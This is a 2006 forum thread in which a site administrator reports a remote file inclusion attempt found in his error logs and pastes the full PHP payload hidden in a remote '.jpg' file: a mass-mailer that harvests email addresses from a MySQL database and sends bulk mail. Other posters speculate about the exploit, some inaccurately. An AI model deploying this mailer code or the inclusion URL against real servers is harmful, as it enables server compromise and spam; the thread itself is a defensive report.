Code Injection ? (Trojaner ?)

PowerPyx · May 08, 2006, 10:32:02 AM

Hi folks,

while parsing the errormessages of my forum i found the following :


Filter hinzufÃ¼gen: Zeige nur Fehlermeldungen dieses Benutzers  Gast  	  Gestern um 01:33:13
Filter hinzufÃ¼gen: Zeige nur Fehlermeldungen dieser IP-Adresse 81.199.58.39   	
Filter hinzufÃ¼gen: Zeige nur Fehlermeldungen dieser URL http://www.rad-community.de/ds1test/index.php?page=http://ibank.glwb.info/mayer.jpg?
Filter hinzufÃ¼gen: Zeige nur Fehlermeldungen mit der gleichen Nachricht
Datenbankfehler: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://ibank.glwb.info/mayer.jpg? AND off=0 AND approved=1 LIMIT 1' at line 1
Datei: /var/www/rad-community/htdocs/ds1test/Sources/TPortal.php
Zeile: 368

i was wondering what the guest want to do so i checked the link and found the following code hidden in the mayer.jpg

Code Select


<?


If ($action=="mysql"){

    #Grab email addresses de MySQL

    include "./mysql.info.php";

    if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){

    print "Porfavor configure su mysql.info.php en tu MySQL informacion. Todas las opciones requeridas.";

    exit;

    }

    $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Conexion en MySQL Fallida.");

    mysql_select_db($sqldb, $db) or die("Seleecione su DataBase $sqldb");

    $result = mysql_query($sqlquery) or die("Secion fallida: $sqlquery");

    $numrows = mysql_num_rows($result);

    

    for($x=0; $x<$numrows; $x++){

    $result_row = mysql_fetch_row($result);

    $oneemail = $result_row[0];

    $emaillist .= $oneemail."\n";

    }

    }



if ($action=="send"){

    $message = urlencode($message);

    $message = ereg_replace("%5C%22", "%22", $message);

    $message = urldecode($message);
    $message = stripslashes($message);
    $subject = stripslashes($subject);

}



?>

<form name="form1" method="post" action="" enctype="multipart/form-data">

  <br>

  <table width="100%" border="0">

    <tr> 

      <td width="10%"> 

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your 

          Mail:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 

        <input type="text" name="from" value="<? print $from; ?>" size="30">

        </font></td>

      <td width="31%"> 

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your 

          Name:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 

        <input type="text" name="realname" value="<? print $realname; ?>" size="30">

        </font></td>

    </tr>

    <tr> 

      <td width="10%"> 

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Repit:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 

        <input type="text" name="replyto" value="<? print $replyto; ?>" size="30">

        </font></td>

      <td width="31%"> 

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Upload 

          Txt:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 

        <input type="file" name="file" size="30">

        </font></td>

    </tr>

    <tr> 

      <td width="10%"> 

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>

      </td>

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 

        <input type="text" name="subject" value="<? print $subject; ?>" size="90">

        </font></td>

    </tr>

    <tr valign="top"> 

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 

        <textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>

        <br>

        <input type="radio" name="contenttype" value="plain">

        Plain 

        <input type="radio" name="contenttype" value="html" checked>

        HTML 

        <input type="hidden" name="action" value="send">

        <input type="submit" value="Send Emails">

        </font></td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> 

        <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>

        </font></td>

    </tr>

  </table>

</form>



<?

if ($action=="send"){



    if (!$from && !$subject && !$message && !$emaillist){

    print "Porfavor complete todo lo necesario.";

    exit;

    }

    

    $allemails = split("\n", $emaillist);

    $numemails = count($allemails);



    #Open the file attachment if any, and base64_encode it for email transport

    If ($file_name){

        @copy($file, "./$file_name") or die("El archivo que intestaste subir al servidor, no puede ser copiado");

        $content = fread(fopen($file,"r"),filesize($file));

        $content = chunk_split(base64_encode($content));

        $uid = strtoupper(md5(uniqid(time())));

        $name = basename($file);

    }

    

    for($x=0; $x<$numemails; $x++){

        $to = $allemails[$x];

        if ($to){

        $to = ereg_replace(" ", "", $to);

        $message = ereg_replace("&email&", $to, $message);

        $subject = ereg_replace("&email&", $to, $subject);

        print "Sending mail to $to.......";

        flush();

        $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

        $header .= "MIME-Version: 1.0\r\n";

        If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";

        If ($file_name) $header .= "--$uid\r\n";

        $header .= "Content-Type: text/$contenttype\r\n";

        $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

        $header .= "$message\r\n";

        If ($file_name) $header .= "--$uid\r\n";

        If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";

        If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";

        If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";

        If ($file_name) $header .= "$content\r\n";

        If ($file_name) $header .= "--$uid--";

        mail($to, $subject, "", $header);

        print "ok<br>";

        flush();

        }

        }



}

?>
<p align="center"><b>Hosted by XGnDX </b></p>

It seems to me that this is a try to get all the email adresses out the sql database to use them as spamadresses.

Does anybody knows this allready or is it completely new ?

PowerPyx

IchBin · May 08, 2006, 06:44:43 PM

Not knowing php well enough it seems to me that they're trying to use some type of exploit.

Xarcell · May 09, 2006, 04:09:30 AM

If he would have used png, it would have worked.

bloc · May 09, 2006, 05:14:24 PM

At least in TP that will not work..the "page" number compare its value to id in the databse. This routine seem to be trying to make something be executed - like the "page" will contains code of some sort for example. But sending excutable code though GET values are very unsafe, so i don't think anyone does that.

Script kiddie?

Anyways, in TP0.9 this will also be better filtered. Any non-number calls will simply not happen, just reported.

IchBin · May 09, 2006, 05:32:11 PM

Quote from: Xarcell on May 09, 2006, 04:09:30 AM
If he would have used png, it would have worked.

May I ask what you are talking about Xarcell? What does the type of graphic have to do with them trying to inject the SQL server with some code?

Recent

User

Stats

Members

Stats

Users Online

Code Injection ? (Trojaner ?)

PowerPyx

IchBin

Xarcell

bloc

IchBin

This website is proudly hosted on Crocweb Cloud Website Hosting.